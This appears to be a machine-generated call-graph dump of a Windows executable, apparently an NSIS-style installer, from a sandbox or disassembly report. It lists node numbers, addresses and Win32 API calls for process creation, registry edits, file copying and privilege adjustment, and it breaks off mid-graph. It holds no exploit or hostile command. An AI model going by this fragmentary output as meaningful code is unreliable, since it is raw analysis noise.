ReadFile 3261->3262 3262->3258 3262->3261 3263 405e62 WriteFile 3262->3263 3263->3262 3264 40321f GetTickCount 3264->3265 3265->3258 3265->3259 3265->3264 3266 403244 MulDiv wsprintfW 3265->3266 3268 405e62 WriteFile 3265->3268 3267 405322 24 API calls 3266->3267 3267->3265 3268->3265 3270 406164 3269->3270 3271 402410 3270->3271 3272 40616f RegCreateKeyExW 3270->3272 3271->3232 3271->3233 3271->3235 3272->3271 3274 405e33 ReadFile 3273->3274 3275 403168 3274->3275 3275->3255 3275->3256 3275->3258 3276->3251 3846 404367 lstrcpynW lstrlenW 3847 401968 3848 402c1f 17 API calls 3847->3848 3849 40196f 3848->3849 3850 402c1f 17 API calls 3849->3850 3851 40197c 3850->3851 3852 402c41 17 API calls 3851->3852 3853 401993 lstrlenW 3852->3853 3854 4019a4 3853->3854 3855 4019e5 3854->3855 3859 4062ba lstrcpynW 3854->3859 3857 4019d5 3857->3855 3858 4019da lstrlenW 3857->3858 3858->3855 3859->3857 3860 402868 3861 402c41 17 API calls 3860->3861 3862 40286f FindFirstFileW 3861->3862 3863 402882 3862->3863 3864 402897 3862->3864 3868 406201 wsprintfW 3864->3868 3866 4028a0 3869 4062ba lstrcpynW 3866->3869 3868->3866 3869->3863 3870 403968 3871 403973 3870->3871 3872 403977 3871->3872 3873 40397a GlobalAlloc 3871->3873 3873->3872 3874 40166a 3875 402c41 17 API calls 3874->3875 3876 401670 3875->3876 3877 4065fd 2 API calls 3876->3877 3878 401676 3877->3878 3302 40176f 3303 402c41 17 API calls 3302->3303 3304 401776 3303->3304 3305 401796 3304->3305 3306 40179e 3304->3306 3341 4062ba lstrcpynW 3305->3341 3342 4062ba lstrcpynW 3306->3342 3309 40179c 3313 40654e 5 API calls 3309->3313 3310 4017a9 3311 405b8f 3 API calls 3310->3311 3312 4017af lstrcatW 3311->3312 3312->3309 3331 4017bb 3313->3331 3314 4065fd 2 API calls 3314->3331 3315 405d8b 2 API calls 3315->3331 3317 4017cd CompareFileTime 3317->3331 3318 40188d 3320 405322 24 API calls 3318->3320 3319 401864 3321 405322 24 API calls 3319->3321 3330 401879 3319->3330 3322 401897 3320->3322 3321->3330 3323 403116 31 API calls 3322->3323 3325 4018aa 3323->3325 3324 4062ba lstrcpynW 3324->3331 3326 4018be SetFileTime 3325->3326 3328 4018d0 CloseHandle 3325->3328 3326->3328 3327 4062dc 17 API calls 3327->3331 3329 4018e1 3328->3329 3328->3330 3332 4018e6 3329->3332 3333 4018f9 3329->3333 3331->3314 3331->3315 3331->3317 3331->3318 3331->3319 3331->3324 3331->3327 3340 405db0 GetFileAttributesW CreateFileW 3331->3340 3343 405920 3331->3343 3334 4062dc 17 API calls 3332->3334 3335 4062dc 17 API calls 3333->3335 3336 4018ee lstrcatW 3334->3336 3337 401901 3335->3337 3336->3337 3339 405920 MessageBoxIndirectW 3337->3339 3339->3330 3340->3331 3341->3309 3342->3310 3344 405935 3343->3344 3345 405981 3344->3345 3346 405949 MessageBoxIndirectW 3344->3346 3345->3331 3346->3345 3879 4027ef 3880 4027f6 3879->3880 3883 402a70 3879->3883 3881 402c1f 17 API calls 3880->3881 3882 4027fd 3881->3882 3884 40280c SetFilePointer 3882->3884 3884->3883 3885 40281c 3884->3885 3887 406201 wsprintfW 3885->3887 3887->3883 3888 4043f0 3889 404408 3888->3889 3893 404522 3888->3893 3894 404231 18 API calls 3889->3894 3890 40458c 3891 404656 3890->3891 3892 404596 GetDlgItem 3890->3892 3899 404298 8 API calls 3891->3899 3895 4045b0 3892->3895 3896 404617 3892->3896 3893->3890 3893->3891 3897 40455d GetDlgItem SendMessageW 3893->3897 3898 40446f 3894->3898 3895->3896 3902 4045d6 SendMessageW LoadCursorW SetCursor 3895->3902 3896->3891 3903 404629 3896->3903 3921 404253 KiUserCallbackDispatcher 3897->3921 3901 404231 18 API calls 3898->3901 3909 404651 3899->3909 3905 40447c CheckDlgButton 3901->3905 3925 40469f 3902->3925 3907 40463f 3903->3907 3908 40462f SendMessageW 3903->3908 3904 404587 3922 40467b 3904->3922 3919 404253 KiUserCallbackDispatcher 3905->3919 3907->3909 3910 404645 SendMessageW 3907->3910 3908->3907 3910->3909 3914 40449a GetDlgItem 3920 404266 SendMessageW 3914->3920 3916 4044b0 SendMessageW 3917 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3916->3917 3918 4044cd GetSysColor 3916->3918 3917->3909 3918->3917 3919->3914 3920->3916 3921->3904 3923 404689 3922->3923 3924 40468e SendMessageW 3922->3924 3923->3924 3924->3890 3928 4058e6 ShellExecuteExW 3925->3928 3927 404605 LoadCursorW SetCursor 3927->3896 3928->3927 3929 401a72 3930 402c1f 17 API calls 3929->3930 3931 401a7b 3930->3931 3932 402c1f 17 API calls 3931->3932 3933 401a20 3932->3933 3934 401573 3935 401583 ShowWindow 3934->3935 3936 40158c 3934->3936 3935->3936 3937 40159a ShowWindow 3936->3937 3938 402ac5 3936->3938 3937->3938 3939 402df3 3940 402e05 SetTimer 3939->3940 3941 402e1e 3939->3941 3940->3941 3942 402e73 3941->3942 3943 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3941->3943 3943->3942 3944 401cf3 3945 402c1f 17 API calls 3944->3945 3946 401cf9 IsWindow 3945->3946 3947 401a20 3946->3947 3948 4014f5 SetForegroundWindow 3949 402ac5 3948->3949 3950 402576 3951 402c41 17 API calls 3950->3951 3952 40257d 3951->3952 3955 405db0 GetFileAttributesW CreateFileW 3952->3955 3954 402589 3955->3954 3616 401b77 3617 401bc8 3616->3617 3619 401b84 3616->3619 3620 401bf2 GlobalAlloc 3617->3620 3621 401bcd 3617->3621 3618 4022e4 3623 4062dc 17 API calls 3618->3623 3619->3618 3625 401b9b 3619->3625 3622 4062dc 17 API calls 3620->3622 3631 401c0d 3621->3631 3635 4062ba lstrcpynW 3621->3635 3622->3631 3624 4022f1 3623->3624 3629 405920 MessageBoxIndirectW 3624->3629 3636 4062ba lstrcpynW 3625->3636 3628 401bdf GlobalFree 3628->3631 3629->3631 3630 401baa 3637 4062ba lstrcpynW 3630->3637 3633 401bb9 3638 4062ba lstrcpynW 3633->3638 3635->3628 3636->3630 3637->3633 3638->3631 3956 404a78 3957 404aa4 3956->3957 3958 404a88 3956->3958 3960 404ad7 3957->3960 3961 404aaa SHGetPathFromIDListW 3957->3961 3967 405904 GetDlgItemTextW 3958->3967 3963 404ac1 SendMessageW 3961->3963 3964 404aba 3961->3964 3962 404a95 SendMessageW 3962->3957 3963->3960 3966 40140b 2 API calls 3964->3966 3966->3963 3967->3962 3968 4024f8 3969 402c81 17 API calls 3968->3969 3970 402502 3969->3970 3971 402c1f 17 API calls 3970->3971 3972 40250b 3971->3972 3973 402533 RegEnumValueW 3972->3973 3974 402527 RegEnumKeyW 3972->3974 3976 40288b 3972->3976 3975 402548 RegCloseKey 3973->3975 3974->3975 3975->3976 3978 40167b 3979 402c41 17 API calls 3978->3979 3980 401682 3979->3980 3981 402c41 17 API calls 3980->3981 3982 40168b 3981->3982 3983 402c41 17 API calls 3982->3983 3984 401694 MoveFileW 3983->3984 3985 4016a7 3984->3985 3991 4016a0 3984->3991 3987 4065fd 2 API calls 3985->3987 3989 402250 3985->3989 3986 401423 24 API calls 3986->3989 3988 4016b6 3987->3988 3988->3989 3990 406080 36 API calls 3988->3990 3990->3991 3991->3986 3992 401e7d 3993 402c41 17 API calls 3992->3993 3994 401e83 3993->3994 3995 402c41 17 API calls 3994->3995 3996 401e8c 3995->3996 3997 402c41 17 API calls 3996->3997 3998 401e95 3997->3998 3999 402c41 17 API calls 3998->3999 4000 401e9e 3999->4000 4001 401423 24 API calls 4000->4001 4002 401ea5 4001->4002 4009 4058e6 ShellExecuteExW 4002->4009 4004 401ee7 4007 40288b 4004->4007 4010 406745 WaitForSingleObject 4004->4010 4006 401f01 CloseHandle 4006->4007 4009->4004 4011 40675f 4010->4011 4012 406771 GetExitCodeProcess 4011->4012 4013 4066d0 2 API calls 4011->4013 4012->4006 4014 406766 WaitForSingleObject 4013->4014 4014->4011 4015 4019ff 4016 402c41 17 API calls 4015->4016 4017 401a06 4016->4017 4018 402c41 17 API calls 4017->4018 4019 401a0f 4018->4019 4020 401a16 lstrcmpiW 4019->4020 4021 401a28 lstrcmpW 4019->4021 4022 401a1c 4020->4022 4021->4022 4023 401000 4024 401037 BeginPaint GetClientRect 4023->4024 4025 40100c DefWindowProcW 4023->4025 4027 4010f3 4024->4027 4028 401179 4025->4028 4029 401073 CreateBrushIndirect FillRect DeleteObject 4027->4029 4030 4010fc 4027->4030 4029->4027 4031 401102 CreateFontIndirectW 4030->4031 4032 401167 EndPaint 4030->4032 4031->4032 4033 401112 6 API calls 4031->4033 4032->4028 4033->4032 4034 401503 4035 40150b 4034->4035 4037 40151e 4034->4037 4036 402c1f 17 API calls 4035->4036 4036->4037 3277 402484 3288 402c81 3277->3288 3280 402c41 17 API calls 3281 402497 3280->3281 3282 4024a2 RegQueryValueExW 3281->3282 3283 40288b 3281->3283 3284 4024c2 3282->3284 3285 4024c8 RegCloseKey 3282->3285 3284->3285 3293 406201 wsprintfW 3284->3293 3285->3283 3289 402c41 17 API calls 3288->3289 3290 402c98 3289->3290 3291 406127 RegOpenKeyExW 3290->3291 3292 40248e 3291->3292 3292->3280 3293->3285 4038 402104 4039 402c41 17 API calls 4038->4039 4040 40210b 4039->4040 4041 402c41 17 API calls 4040->4041 4042 402115 4041->4042 4043 402c41 17 API calls 4042->4043 4044 40211f 4043->4044 4045 402c41 17 API calls 4044->4045 4046 402129 4045->4046 4047 402c41 17 API calls 4046->4047 4049 402133 4047->4049 4048 402172 CoCreateInstance 4053 402191 4048->4053 4049->4048 4050 402c41 17 API calls 4049->4050 4050->4048 4051 401423 24 API calls 4052 402250 4051->4052 4053->4051 4053->4052 4054 401f06 4055 402c41 17 API calls 4054->4055 4056 401f0c 4055->4056 4057 405322 24 API calls 4056->4057 4058 401f16 4057->4058 4059 4058a3 2 API calls 4058->4059 4060 401f1c 4059->4060 4061 401f3f CloseHandle 4060->4061 4062 40288b 4060->4062 4063 406745 5 API calls 4060->4063 4061->4062 4065 401f31 4063->4065 4065->4061 4067 406201 wsprintfW 4065->4067 4067->4061 4068 40190c 4069 401943 4068->4069 4070 402c41 17 API calls 4069->4070 4071 401948 4070->4071 4072 4059cc 67 API calls 4071->4072 4073 401951 4072->4073 4074 40230c 4075 402314 4074->4075 4077 40231a 4074->4077 4076 402c41 17 API calls 4075->4076 4076->4077 4078 402328 4077->4078 4080 402c41 17 API calls 4077->4080 4079 402336 4078->4079 4081 402c41 17 API calls 4078->4081 4082 402c41 17 API calls 4079->4082 4080->4078 4081->4079 4083 40233f WritePrivateProfileStringW 4082->4083 4084 401f8c 4085 402c41 17 API calls 4084->4085 4086 401f93 4085->4086 4087 406694 5 API calls 4086->4087 4088 401fa2 4087->4088 4089 402026 4088->4089 4090 401fbe GlobalAlloc 4088->4090 4090->4089 4091 401fd2 4090->4091 4092 406694 5 API calls 4091->4092 4093 401fd9 4092->4093 4094 406694 5 API calls 4093->4094 4095 401fe3 4094->4095 4095->4089 4099 406201 wsprintfW 4095->4099 4097 402018 4100 406201 wsprintfW 4097->4100 4099->4097 4100->4089 4101 40238e 4102 4023c1 4101->4102 4103 402396 4101->4103 4105 402c41 17 API calls 4102->4105 4104 402c81 17 API calls 4103->4104 4107 40239d 4104->4107 4106 4023c8 4105->4106 4112 402cff 4106->4112 4109 4023d5 4107->4109 4110 402c41 17 API calls 4107->4110 4111 4023ae RegDeleteValueW RegCloseKey 4110->4111 4111->4109 4113 402d13 4112->4113 4115 402d0c 4112->4115 4113->4115 4116 402d44 4113->4116 4115->4109 4117 406127 RegOpenKeyExW 4116->4117 4118 402d72 4117->4118 4119 402d98 RegEnumKeyW 4118->4119 4120 402daf RegCloseKey 4118->4120 4121 402dd0 RegCloseKey 4118->4121 4123 402d44 6 API calls 4118->4123 4126 402dc3 4118->4126 4119->4118 4119->4120 4122 406694 5 API calls 4120->4122 4121->4126 4124 402dbf 4122->4124 4123->4118 4125 402de0 RegDeleteKeyW 4124->4125 4124->4126 4125->4126 4126->4115 3347 40338f SetErrorMode GetVersion 3348 4033ce 3347->3348 3349 4033d4 3347->3349 3350 406694 5 API calls 3348->3350 3351 406624 3 API calls 3349->3351 3350->3349 3352 4033ea lstrlenA 3351->3352 3352->3349 3353 4033fa 3352->3353 3354 406694 5 API calls 3353->3354 3355 403401 3354->3355 3356 406694 5 API calls 3355->3356 3357 403408 3356->3357 3358 406694 5 API calls 3357->3358 3359 403414 #17 OleInitialize SHGetFileInfoW 3358->3359 3437 4062ba lstrcpynW 3359->3437 3362 403460 GetCommandLineW 3438 4062ba lstrcpynW 3362->3438 3364 403472 3365 405bbc CharNextW 3364->3365 3366 403497 CharNextW 3365->3366 3367 4035c1 GetTempPathW 3366->3367 3378 4034b0 3366->3378 3439 40335e 3367->3439 3369 4035d9 3370 403633 DeleteFileW 3369->3370 3371 4035dd GetWindowsDirectoryW lstrcatW 3369->3371 3449 402edd GetTickCount GetModuleFileNameW 3370->3449 3372 40335e 12 API calls 3371->3372 3375 4035f9 3372->3375 3373 405bbc CharNextW 3373->3378 3375->3370 3377 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3375->3377 3376 403647 3379 4036fe ExitProcess CoUninitialize 3376->3379 3388 405bbc CharNextW 3376->3388 3420 4036ea 3376->3420 3380 40335e 12 API calls 3377->3380 3378->3373 3381 4035ac 3378->3381 3382 4035aa 3378->3382 3383 403834 3379->3383 3384 403714 3379->3384 3386 40362b 3380->3386 3533 4062ba lstrcpynW 3381->3533 3382->3367 3385 40383c GetCurrentProcess OpenProcessToken 3383->3385 3395 4038b8 ExitProcess 3383->3395 3390 405920 MessageBoxIndirectW 3384->3390 3392 403854 LookupPrivilegeValueW AdjustTokenPrivileges 3385->3392 3393 403888 3385->3393 3386->3370 3386->3379 3404 403666 3388->3404 3391 403722 ExitProcess 3390->3391 3392->3393 3397 406694 5 API calls 3393->3397 3394 4036fa 3394->3379 3400 40388f 3397->3400 3398 4036c4 3402 405c97 18 API calls 3398->3402 3399 40372a 3401 40588b 5 API calls 3399->3401 3403 4038a4 ExitWindowsEx 3400->3403 3407 4038b1 3400->3407 3405 40372f lstrcatW 3401->3405 3406 4036d0 3402->3406 3403->3395 3403->3407 3404->3398 3404->3399 3408 403740 lstrcatW 3405->3408 3409 40374b lstrcatW lstrcmpiW 3405->3409 3406->3379 3534 4062ba lstrcpynW 3406->3534 3541 40140b 3407->3541 3408->3409 3409->3379 3411 403767 3409->3411 3413 403773 3411->3413 3414 40376c 3411->3414 3418 40586e 2 API calls 3413->3418 3416 4057f1 4 API calls 3414->3416 3415 4036df 3535 4062ba lstrcpynW 3415->3535 3419 403771 3416->3419 3421 403778 SetCurrentDirectoryW 3418->3421 3419->3421 3477 4039aa 3420->3477 3422 403793 3421->3422 3423 403788 3421->3423 3537 4062ba lstrcpynW 3422->3537 3536 4062ba lstrcpynW 3423->3536 3426 4062dc 17 API calls 3427 4037d2 DeleteFileW 3426->3427 3428 4037df CopyFileW 3427->3428 3434 4037a1 3427->3434 3428->3434 3429 403828 3430 406080 36 API calls 3429->3430 3432 40382f 3430->3432 3431 406080 36 API calls 3431->3434 3432->3379 3433 4062dc 17 API calls 3433->3434 3434->3426 3434->3429 3434->3431 3434->3433 3436 403813 CloseHandle 3434->3436 3538 4058a3 CreateProcessW 3434->3538 3436->3434 3437->3362 3438->3364 3440 40654e 5 API calls 3439->3440 3442 40336a 3440->3442 3441 403374 3441->3369 3442->3441 3443 405b8f 3 API calls 3442->3443 3444 40337c 3443->3444 3445 40586e 2 API calls 3444->3445 3446 403382 3445->3446 3544 405ddf 3446->3544 3548 405db0 GetFileAttributesW CreateFileW 3449->3548 3451 402f1d 3476 402f2d 3451->3476 3549 4062ba lstrcpynW 3451->3549 3453 402f43 3454 405bdb 2 API calls 3453->3454 3455 402f49 3454->3455 3550 4062ba lstrcpynW 3455->3550 3457 402f54 GetFileSize 3458 403050 3457->3458 3475 402f6b 3457->3475 3551 402e79 3458->3551 3460 403059 3462 403089 GlobalAlloc 3460->3462 3460->3476 3563 403347 SetFilePointer 3460->3563 3461 403331 ReadFile 3461->3475 3562 403347 SetFilePointer 3462->3562 3464 4030bc 3466 402e79 6 API calls 3464->3466 3466->3476 3467 403072 3469 403331 ReadFile 3467->3469 3468 4030a4 3470 403116 31 API calls 3468->3470 3471 40307d 3469->3471 3473 4030b0 3470->3473 3471->3462 3471->3476 3472 402e79 6 API calls 3472->3475 3473->3473 3474 4030ed SetFilePointer 3473->3474 3473->3476 3474->3476 3475->3458 3475->3461 3475->3464 3475->3472 3475->3476 3476->3376 3478 406694 5 API calls 3477->3478 3479 4039be 3478->3479 3480 4039c4 3479->3480 3481 4039d6 3479->3481 3576 406201 wsprintfW 3480->3576 3482 406188 3 API calls 3481->3482 3483 403a06 3482->3483 3485 403a25 lstrcatW 3483->3485 3487 406188 3 API calls 3483->3487 3486 4039d4 3485->3486 3568 403c80 3486->3568 3487->3485 3490 405c97 18 API calls 3491 403a57 3490->3491 3492 403aeb 3491->3492 3494 406188 3 API calls 3491->3494 3493 405c97 18 API calls 3492->3493 3495 403af1 3493->3495 3496 403a89 3494->3496 3497 403b01 LoadImageW 3495->3497 3498 4062dc 17 API calls 3495->3498 3496->3492 3501 403aaa lstrlenW 3496->3501 3504 405bbc CharNextW 3496->3504 3499 403ba7 3497->3499 3500 403b28 RegisterClassW 3497->3500 3498->3497 3503 40140b 2 API calls 3499->3503 3502 403b5e SystemParametersInfoW CreateWindowExW 3500->3502 3532 403bb1 3500->3532 3505 403ab8 lstrcmpiW 3501->3505 3506 403ade 3501->3506 3502->3499 3507 403bad 3503->3507 3508 403aa7 3504->3508 3505->3506 3509 403ac8 GetFileAttributesW 3505->3509 3510 405b8f 3 API calls 3506->3510 3512 403c80 18 API calls 3507->3512 3507->3532 3508->3501 3511 403ad4 3509->3511 3513 403ae4 3510->3513 3511->3506 3515 405bdb 2 API calls 3511->3515 3516 403bbe 3512->3516 3577 4062ba lstrcpynW 3513->3577 3515->3506 3517 403bca ShowWindow 3516->3517 3518 403c4d 3516->3518 3519 406624 3 API calls 3517->3519 3520 4053f5 5 API calls 3518->3520 3521 403be2 3519->3521 3522 403c53 3520->3522 3523 403bf0 GetClassInfoW 3521->3523 3526 406624 3 API calls 3521->3526 3524 403c57 3522->3524 3525 403c6f 3522->3525 3528 403c04 GetClassInfoW RegisterClassW 3523->3528 3529 403c1a DialogBoxParamW 3523->3529 3530 40140b 2 API calls 3524->3530 3524->3532 3527 40140b 2 API calls 3525->3527 3526->3523 3527->3532 3528->3529 3531 40140b 2 API calls 3529->3531 3530->3532 3531->3532 3532->3394 3533->3382 3534->3415 3535->3420 3536->3422 3537->3434 3539 4058e2 3538->3539 3540 4058d6 CloseHandle 3538->3540 3539->3434 3540->3539 3542 401389 2 API calls 3541->3542 3543 401420 3542->3543 3543->3395 3545 405dec GetTickCount GetTempFileNameW 3544->3545 3546 405e22 3545->3546 3547 40338d 3545->3547 3546->3545 3546->3547 3547->3369 3548->3451 3549->3453 3550->3457 3552 402e82 3551->3552 3553 402e9a 3551->3553 3554 402e92 3552->3554 3555 402e8b DestroyWindow 3552->3555 3556 402ea2 3553->3556 3557 402eaa GetTickCount 3553->3557 3554->3460 3555->3554 3564 4066d0 3556->3564 3559 402eb8 CreateDialogParamW ShowWindow 3557->3559 3560 402edb 3557->3560 3559->3560 3560->3460 3562->3468 3563->3467 3565 4066ed PeekMessageW 3564->3565 3566 4066e3 DispatchMessageW 3565->3566 3567 402ea8 3565->3567 3566->3565 3567->3460 3569 403c94 3568->3569 3578 406201 wsprintfW 3569->3578 3571 403d05 3579 403d39 3571->3579 3573 403d0a 3574 403a35 3573->3574 3575 4062dc 17 API calls 3573->3575 3574->3490 3575->3573 3576->3486 3577->3492 3578->3571 3580 4062dc 17 API calls 3579->3580 3581 403d47 SetWindowTextW 3580->3581 3581->3573 4127 40190f 4128 402c41 17 API calls 4127->4128 4129 401916 4128->4129 4130 405920 MessageBoxIndirectW 4129->4130 4131 40191f 4130->4131 4132 401491 4133 405322 24 API calls 4132->4133 4134 401498 4133->4134 4135 401d14 4136 402c1f 17 API calls 4135->4136 4137 401d1b 4136->4137 4138 402c1f 17 API calls 4137->4138 4139 401d27 GetDlgItem 4138->4139 4140 402592 4139->4140 4141 405296 4142 4052a6 4141->4142 4143 4052ba 4141->4143 4145 4052ac 4142->4145 4153 405303 4142->4153 4144 4052c2 IsWindowVisible 4143->4144 4147 4052d9 4143->4147 4146 4052cf 4144->4146 4144->4153 4149 40427d SendMessageW 4145->4149 4154 404bec SendMessageW 4146->4154 4148 405308 CallWindowProcW 4147->4148 4159 404c6c 4147->4159 4150 4052b6 4148->4150 4149->4150 4153->4148 4155 404c4b SendMessageW 4154->4155 4156 404c0f GetMessagePos ScreenToClient SendMessageW 4154->4156 4157 404c43 4155->4157 4156->4157 4158 404c48 4156->4158 4157->4147 4158->4155 4168 4062ba lstrcpynW 4159->4168 4161 404c7f 4169 406201 wsprintfW 4161->4169 4163 404c89 4164 40140b 2 API calls 4163->4164 4165 404c92 4164->4165 4170 4062ba lstrcpynW 4165->4170 4167 404c99 4167->4153 4168->4161 4169->4163 4170->4167 4171 402598 4172 4025c7 4171->4172 4173 4025ac 4171->4173 4175 4025fb 4172->4175 4176 4025cc 4172->4176 4174 402c1f 17 API calls 4173->4174 4181 4025b3 4174->4181 4178 402c41 17 API calls 4175->4178 4177 402c41 17 API calls 4176->4177 4179 4025d3 WideCharToMultiByte lstrlenA 4177->4179 4180 402602 lstrlenW 4178->4180 4179->4181 4180->4181 4182 40262f 4181->4182 4183 402645 4181->4183 4185 405e91 5 API calls 4181->4185 4182->4183 4184 405e62 WriteFile 4182->4184 4184->4183 4185->4182 4186 404c9e GetDlgItem GetDlgItem 4187 404cf0 7 API calls 4186->4187 4194 404f09 4186->4194 4188 404d93 DeleteObject 4187->4188 4189 404d86 SendMessageW 4187->4189 4190 404d9c 4188->4190 4189->4188 4192 404dd3 4190->4192 4193 4062dc 17 API calls 4190->4193 4191 404fed 4196 405099 4191->4196 4207 405046 SendMessageW 4191->4207 4229 404efc 4191->4229 4195 404231 18 API calls 4192->4195 4198 404db5 SendMessageW SendMessageW 4193->4198 4194->4191 4197 404f7a 4194->4197 4205 404bec 5 API calls 4194->4205 4201 404de7 4195->4201 4199 4050a3 SendMessageW 4196->4199 4200 4050ab 4196->4200 4197->4191 4203 404fdf SendMessageW 4197->4203 4198->4190 4199->4200 4204 4050d4 4200->4204 4209 4050c4 4200->4209 4210 4050bd ImageList_Destroy 4200->4210 4206 404231 18 API calls 4201->4206 4202 404298 8 API calls 4208 40528f 4202->4208 4203->4191 4212 405243 4204->4212 4228 404c6c 4 API calls 4204->4228 4233 40510f 4204->4233 4205->4197 4211 404df5 4206->4211 4213 40505b SendMessageW 4207->4213 4207->4229 4209->4204 4214 4050cd GlobalFree 4209->4214 4210->4209 4215 404eca GetWindowLongW SetWindowLongW 4211->4215 4222 404ec4 4211->4222 4225 404e45 SendMessageW 4211->4225 4226 404e81 SendMessageW 4211->4226 4227 404e92 SendMessageW 4211->4227 4216 405255 ShowWindow GetDlgItem ShowWindow 4212->4216 4212->4229 4218 40506e 4213->4218 4214->4204 4217 404ee3 4215->4217 4216->4229 4219 404f01 4217->4219 4220 404ee9 ShowWindow 4217->4220 4221 40507f SendMessageW 4218->4221 4238 404266 SendMessageW 4219->4238 4237 404266 SendMessageW 4220->4237 4221->4196 4222->4215 4222->4217 4225->4211 4226->4211 4227->4211 4228->4233 4229->4202 4230 405219 InvalidateRect 4230->4212 4231 40522f 4230->4231 4239 404ba7 4231->4239 4232 40513d SendMessageW 4236 405153 4232->4236 4233->4232 4233->4236 4235 4051c7 SendMessageW SendMessageW 4235->4236 4236->4230 4236->4235 4237->4229 4238->4194 4242 404ade 4239->4242 4241 404bbc 4241->4212 4243 404af7 4242->4243 4244 4062dc 17 API calls 4243->4244 4245 404b5b 4244->4245 4246 4062dc 17 API calls 4245->4246 4247 404b66 4246->4247 4248 4062dc 17 API calls 4247->4248 4249 404b7c lstrlenW wsprintfW SetDlgItemTextW 4248->4249 4249->4241 4250 40149e 4251 4022f7 4250->4251 4252 4014ac PostQuitMessage 4250->4252 4252->4251 3734 401c1f 3735 402c1f 17 API calls 3734->3735 3736 401c26 3735->3736 3737 402c1f 17 API calls 3736->3737 3738 401c33 3737->3738 3739 401c48 3738->3739 3741 402c41 17 API calls 3738->3741 3740 401c58 3739->3740 3742 402c41 17 API calls 3739->3742 3743 401c63 3740->3743 3744 401caf 3740->3744 3741->3739 3742->3740 3745 402c1f 17 API calls 3743->3745 3746 402c41 17 API calls 3744->3746 3747 401c68 3745->3747 3748 401cb4 3746->3748 3749 402c1f 17 API calls 3747->3749 3750 402c41 17 API calls 3748->3750 3751 401c74 3749->3751 3752 401cbd FindWindowExW 3750->3752 3753 401c81 SendMessageTimeoutW 3751->3753 3754 401c9f SendMessageW 3751->3754 3755 401cdf 3752->3755 3753->3755 3754->3755 4253 402aa0 SendMessageW 4254 402ac5 4253->4254 4255 402aba InvalidateRect 4253->4255 4255->4254 4256 402821 4257 402827 4256->4257 4258 402ac5 4257->4258 4259 40282f FindClose 4257->4259 4259->4258 4260 4043a1 lstrlenW 4261 4043c0 4260->4261 4262 4043c2 WideCharToMultiByte 4260->4262 4261->4262 4263 404722 4264 40474e 4263->4264 4265 40475f 4263->4265 4324 405904 GetDlgItemTextW 4264->4324 4267 40476b GetDlgItem 4265->4267 4273 4047ca 4265->4273 4269 40477f 4267->4269 4268 404759 4271 40654e 5 API calls 4268->4271 4272 404793 SetWindowTextW 4269->4272 4280 405c3a 4 API calls 4269->4280 4270 4048ae 4274 404a5d 4270->4274 4326 405904 GetDlgItemTextW 4270->4326 4271->4265 4276 404231 18 API calls 4272->4276 4273->4270 4273->4274 4277 4062dc 17 API calls 4273->4277 4279 404298 8 API calls 4274->4279 4281 4047af 4276->4281 4282 40483e SHBrowseForFolderW 4277->4282 4278 4048de 4283 405c97 18 API calls 4278->4283 4284 404a71 4279->4284 4285 404789 4280->4285 4286 404231 18 API calls 4281->4286 4282->4270 4287 404856 CoTaskMemFree 4282->4287 4288 4048e4 4283->4288 4285->4272 4291 405b8f 3 API calls 4285->4291 4289 4047bd 4286->4289 4290 405b8f 3 API calls 4287->4290 4327 4062ba lstrcpynW 4288->4327 4325 404266 SendMessageW 4289->4325 4293 404863 4290->4293 4291->4272 4296 40489a SetDlgItemTextW 4293->4296 4300 4062dc 17 API calls 4293->4300 4295 4047c3 4298 406694 5 API calls 4295->4298 4296->4270 4297 4048fb 4299 406694 5 API calls 4297->4299 4298->4273 4307 404902 4299->4307 4301 404882 lstrcmpiW 4300->4301 4301->4296 4304 404893 lstrcatW 4301->4304 4302 404943 4328 4062ba lstrcpynW 4302->4328 4304->4296 4305 40494a 4306 405c3a 4 API calls 4305->4306 4308 404950 GetDiskFreeSpaceW 4306->4308 4307->4302 4310 405bdb 2 API calls 4307->4310 4312 40499b 4307->4312 4311 404974 MulDiv 4308->4311 4308->4312 4310->4307 4311->4312 4313 404a0c 4312->4313 4314 404ba7 20 API calls 4312->4314 4315 404a2f 4313->4315 4317 40140b 2 API calls 4313->4317 4316 4049f9 4314->4316 4329 404253 KiUserCallbackDispatcher 4315->4329 4319 404a0e SetDlgItemTextW 4316->4319 4320 4049fe 4316->4320 4317->4315 4319->4313 4322 404ade 20 API calls 4320->4322 4321 404a4b 4321->4274 4323 40467b SendMessageW 4321->4323 4322->4313 4323->4274 4324->4268 4325->4295 4326->4278 4327->4297 4328->4305 4329->4321 4330 4015a3 4331 402c41 17 API calls 4330->4331 4332 4015aa SetFileAttributesW 4331->4332 4333 4015bc 4332->4333 4334 4029a8 4335 402c1f 17 API calls 4334->4335 4336 4029ae 4335->4336 4337 4029d5 4336->4337 4338 4029ee 4336->4338 4346 40288b 4336->4346 4341 4029da 4337->4341 4347 4029eb 4337->4347 4339 402a08 4338->4339 4340 4029f8 4338->4340 4343 4062dc 17 API calls 4339->4343 4342 402c1f 17 API calls 4340->4342 4348 4062ba lstrcpynW 4341->4348 4342->4347 4343->4347 4347->4346 4349 406201 wsprintfW 4347->4349 4348->4346 4349->4346 4350 4028ad 4351 402c41 17 API calls 4350->4351 4353 4028bb 4351->4353 4352 4028d1 4355 405d8b 2 API calls 4352->4355 4353->4352 4354 402c41 17 API calls 4353->4354 4354->4352 4356 4028d7 4355->4356 4378 405db0 GetFileAttributesW CreateFileW 4356->4378 4358 4028e4 4359 4028f0 GlobalAlloc 4358->4359 4360 402987 4358->4360 4363 402909 4359->4363 4364 40297e CloseHandle 4359->4364 4361 4029a2 4360->4361 4362 40298f DeleteFileW 4360->4362 4362->4361 4379 403347 SetFilePointer 4363->4379 4364->4360 4366 40290f 4367 403331 ReadFile 4366->4367 4368 402918 GlobalAlloc 4367->4368 4369 402928 4368->4369 4370 40295c 4368->4370 4371 403116 31 API calls 4369->4371 4372 405e62 WriteFile 4370->4372 4374 402935 4371->4374 4373 402968 GlobalFree 4372->4373 4375 403116 31 API calls 4373->4375 4376 402953 GlobalFree 4374->4376 4377 40297b 4375->4377 4376->4370 4377->4364 4378->4358 4379->4366 4380 401a30 4381 402c41 17 API calls 4380->4381 4382 401a39 ExpandEnvironmentStringsW 4381->4382 4383 401a4d 4382->4383 4385 401a60 4382->4385 4384 401a52 lstrcmpW 4383->4384 4383->4385 4384->4385 3593 402032 3594 402044 3593->3594 3604 4020f6 3593->3604 3595 402c41 17 API calls 3594->3595 3597 40204b 